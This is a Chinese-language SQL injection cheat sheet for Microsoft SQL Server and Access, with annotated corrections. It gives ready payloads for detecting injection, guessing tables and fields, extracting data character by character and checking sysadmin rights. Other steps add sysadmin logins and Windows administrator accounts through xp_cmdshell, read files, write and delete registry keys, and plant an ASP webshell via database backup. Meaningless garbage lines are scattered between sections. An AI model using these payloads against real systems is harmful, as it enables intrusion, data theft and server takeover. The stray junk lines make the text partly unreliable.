1.判断是否有注入：;and 1=1 与 ;and 1=2（两次请求页面返回不同，说明条件被拼进了 SQL，可能存在注入）
2.初步判断是否是mssql：;and user>0（依赖 MSSQL 把 nvarchar 型的 user 转成 int 失败时报错，错误信息里会直接带出当前登录名；若服务器关闭了详细错误回显，此法无效）
!M
Ye9Y^+-
3.注入参数是字符型：'and [查询条件] and ''='（先用单引号闭合原语句中的字符串，结尾的 ''=' 用来补全被截断的引号，使整条语句语法合法）
4.搜索时没过滤参数的：'and [查询条件] and '%25'='（%25 是 URL 编码的 %，服务端解码后为 '%'='，用于闭合 LIKE '%...%' 形式的搜索语句）
"j{i,&Y$_
5.判断数据库系统
;and (select count(*) from sysobjects)>0    为真则是 mssql（sysobjects 是 SQL Server 的系统表，2005 起官方推荐 sys.objects，但旧名依然可用）
;and (select count(*) from msysobjects)>0   为真则是 access（MSysObjects 是 Access 的系统表，通常对普通用户没有读权限，所以常是靠"无读权限"这类报错而不是计数结果来判断）
\|CPR6I
10p8|9rE}B
yn SBVb!)
6.猜表名：;and (select Count(*) from [表名])>0（注意 from 后面接的是表名而不是数据库名，原文的"数据库名"是误写；表不存在会报错或返回假）
#
;K,,ku
x
7.猜字段：;and (select Count(字段名) from 表名)>0（from 后接第 6 步猜出的表名；字段不存在会报错或返回假）
=M7TCE
8.猜字段中记录长度：;and (select top 1 len(字段名) from 表名)>0（逐步加大比较值或二分即可得到长度；Access 和 MSSQL 都有 len，MSSQL 也可用 datalength）
MkwU<ae AB
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
（逐位比较 >0、>64、>96 … 用二分缩小范围即可还原整个值，再把 1 换成 2、3 … 取下一位；asc/mid 是 Access(Jet) 函数，unicode/substring 是 MSSQL 函数，两者不能混用）
8{dEpV*
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
（IS_SRVROLEMEMBER 判断当前登录是否属于某个服务器角色，IS_MEMBER 判断当前用户在当前数据库里是否属于某个数据库角色；返回 1 为真、0 为假、NULL 表示角色名无效。后面 11、12、13 节用到的 xp_cmdshell、xp_dirtree、xp_reg* 等扩展存储过程基本都要求 sysadmin，所以先看 sysadmin 这一条。）
',7a E@PJ
F@Q^?WV
WmeKl
11.添加mssql和系统的帐户（需要 sysadmin 权限；sp_addlogin/sp_password 在 SQL Server 2005 以后已标记为弃用，新版本应改用 CREATE LOGIN / ALTER LOGIN；xp_cmdshell 从 2005 起默认关闭，需先用 sp_configure 打开）
;exec master.dbo.sp_addlogin username,password;--   （原文只给了登录名，不带密码参数时创建的是空密码登录）
;exec master.dbo.sp_password null,password,username;--   （参数顺序是 旧密码,新密码,登录名；原文写成 null,username,password 会把登录名和密码弄反）
;exec master.dbo.sp_addsrvrolemember username,sysadmin;--   （参数顺序是 登录名,角色名；原文写成 sysadmin username 顺序反了且缺逗号）
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--   （各开关之间要有空格，原文缺失）
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
（xp_cmdshell 以 SQL Server 服务账号的身份执行命令，服务账号没有本地管理员权限时 net user /add 会失败）
aBhV3Fd[B
"xe=N
MoD?2J
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>0
（xp_dirtree 返回 subdirectory、depth 两列，正好对应 dirs 表的两列；把 varchar 和 0 比较会触发类型转换报错，目录名就在报错信息里，因此需要页面回显数据库错误；原文末尾的 ">)" 是 ">0" 的笔误。not in 里逐步累加已经取到的目录名即可遍历完，用完记得 drop table dirs。）
y7:tr
\=;uu_v$
Ye5jB2Z
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器（返回 4 列，正好填满 temp 表）
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表（返回 1 列）
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树（返回 2 列：目录名、深度）
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容（每行输出一条记录，需要 xp_cmdshell 可用）
（insert ... exec 的列数必须和存储过程返回的列数一致，否则报错；读取方式同 (1)，用 select top 1 ... not in(...) 逐条报错带出）
n((vY.NDV
$bvJTuw
5|I55CTx
13.mssql中的存储过程（xp_reg* 都是未公开的注册表扩展存储过程，默认只有 sysadmin 可执行）
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'   以多个记录集方式返回该子键下所有键值（这里枚举的是开机自启动项）
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'   返回指定键值的内容
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型常用的有2种：REG_SZ 表示字符串,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'   写入注册表
xp_regdeletevalue 根键,子键,值名
;exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'   删除某个值
;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'   删除键,包括该键下所有值（原文此行和上一行缺少 exec）
VZy4_v=
?4 S+edX
#]]Su91BA
14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');   -- 单引号里放要写入文件的 ASP 代码，原文留空了
backup database model to disk='c:\l.asp';
（原理：备份文件里会原样包含 image 列的内容，ASP 解析器只执行 <% %> 之间的部分，其余二进制内容被当作页面文本输出。要求 SQL Server 服务账号对目标目录有写权限，且目标路径要在 Web 目录下才能访问到；选 model 这种小库是为了减小备份文件体积。用完应删掉 model 库里的 cmd 表，否则之后新建的每个数据库都会带上这张表。）
g(C|!}ex/
|X19fgk
k]A8% z
15.mssql内置函数
;and (select @@version)>0   报错带出 SQL Server 版本信息（其中也包含所在 Windows 的版本，并不只是 Windows 版本号）
;and user_name()='dbo'      判断当前连接用户在当前库里是否映射为 dbo（sa/sysadmin 会映射为 dbo，但库的所有者也会，所以不能直接等同于 sa；要确认 sa 级权限应使用第 10 节的 IS_SRVROLEMEMBER('sysadmin')）
;and (select user_name())>0   爆当前系统的连接用户
;and (select db_name())>0     得到当前连接的数据库
（以上都是把字符串和整数比较、靠类型转换错误把数据带进报错信息的"报错注入"，前提是页面回显数据库错误）
*?ITns W<
Ih}1%Jq
p d[ncL
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('');   -- 单引号里放要写入文件的 ASP 代码，原文留空了
backup database model to disk='g:\wwwtest\l.asp';
（与第 14 节完全相同，只是备份路径直接指向 Web 目录；同样要求 SQL Server 服务账号对该目录有写权限，用完应删掉 model 库里的 cmd 表）